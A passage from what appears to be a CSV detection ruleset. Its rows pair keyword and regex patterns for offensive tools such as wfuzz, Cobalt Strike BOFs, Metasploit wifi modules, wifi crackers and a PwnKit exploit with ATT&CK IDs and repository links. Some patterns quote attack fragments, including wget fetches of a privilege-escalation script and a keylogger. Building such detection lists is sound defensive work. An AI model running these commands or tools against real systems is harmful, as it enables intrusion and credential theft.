fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.bat*",".{0,1000}wfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.get_payload*",".{0,1000}wfuzz\.get_payload.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.py*",".{0,1000}wfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.wfuzz*",".{0,1000}wfuzz\.wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz/wordlist*",".{0,1000}wfuzz\/wordlist.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wfuzz-cli.py*",".{0,1000}wfuzz\-cli\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzzp.py*",".{0,1000}wfuzzp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wgen.py*",".{0,1000}wgen\.py.{0,1000}","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","2","106","34","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z" "*wget *http-vuln-cve2020-5902.nse*",".{0,1000}wget\s.{0,1000}http\-vuln\-cve2020\-5902\.nse.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wget* -O les.sh*",".{0,1000}wget.{0,1000}\s\-O\sles\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*",".{0,1000}wget.{0,1000}\/drapl0n\/DuckyLogger\/blob\/main\/xinput\\\?raw\=true.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Wh04m1001/DFSCoerce*",".{0,1000}Wh04m1001\/DFSCoerce.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*wh0amitz/BypassCredGuard*",".{0,1000}wh0amitz\/BypassCredGuard.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*wh0amitz/PetitPotato*",".{0,1000}wh0amitz\/PetitPotato.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*wh0amitz/S4UTomato*",".{0,1000}wh0amitz\/S4UTomato.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*wh0amitz/SharpADWS*",".{0,1000}wh0amitz\/SharpADWS.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*Wh1t3Fox/polenum*",".{0,1000}Wh1t3Fox\/polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WhatBreach*",".{0,1000}WhatBreach.{0,1000}","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","1059","159","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z" "*whatlicense-main.zip*",".{0,1000}whatlicense\-main\.zip.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*whereami.cna*",".{0,1000}whereami\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*whereami.x64*",".{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*WheresMyImplant.cs*",".{0,1000}WheresMyImplant\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*WheresMyImplant.git*",".{0,1000}WheresMyImplant\.git.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*WheresMyImplant.sln*",".{0,1000}WheresMyImplant\.sln.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*while * do mv *GCONV_PATH=./value* done",".{0,1000}while\s.{0,1000}\sdo\smv\s.{0,1000}GCONV_PATH\=\.\/value.{0,1000}\sdone","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034 ","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*Whirlpool-Orig-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Orig\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Whirlpool-Tweak-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Tweak\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Whisker.DSInternals*",".{0,1000}Whisker\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Whisker.exe*",".{0,1000}Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*whiskeysaml.py*",".{0,1000}whiskeysaml\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*whiskeysamlandfriends*",".{0,1000}whiskeysamlandfriends.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*",".{0,1000}whoami\s\/priv\s\|\sfindstr\s\/i\s\/C\:.{0,1000}SeImpersonatePrivilege.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*whoami /user*",".{0,1000}whoami\s\/user.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*whoami.nim*",".{0,1000}whoami\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*whoami.py*",".{0,1000}whoami\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*WhoamiGetTokenInfo*",".{0,1000}WhoamiGetTokenInfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*wifi/airpwn*",".{0,1000}wifi\/airpwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wifi/dnspwn*",".{0,1000}wifi\/dnspwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wifi_dos_own.py*",".{0,1000}wifi_dos_own\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*wifi_dos3.py*",".{0,1000}wifi_dos3\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*wifi_dump_linux*",".{0,1000}wifi_dump_linux.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*wifi_fake_auth.*",".{0,1000}wifi_fake_auth\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*WiFi_Hacker.ino*",".{0,1000}WiFi_Hacker\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*wifi_pineapple_csrf*",".{0,1000}wifi_pineapple_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*wifi_recon_handshakes*",".{0,1000}wifi_recon_handshakes.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*wifi-arsenal*",".{0,1000}wifi\-arsenal.{0,1000}","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1806","399","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" "*wifibroot.py*",".{0,1000}wifibroot\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1185","313","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" "*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1185","313","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" "*wifidump.cna*",".{0,1000}wifidump\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*wifijammer*",".{0,1000}wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3880","779","2024-02-09T16:04:36Z","2014-01-26T07:54:39Z" "*WifiPasswords.ps1*",".{0,1000}WifiPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*wifiphisher*",".{0,1000}wifiphisher.{0,1000}","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12711","2564","2023-12-17T02:00:16Z","2014-09-26T12:47:28Z" "*WiFi-Pumpkin*",".{0,1000}WiFi\-Pumpkin.{0,1000}","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","10","3071","716","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z" "*wifite --crack*",".{0,1000}wifite\s\-\-crack.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*wifite --dict 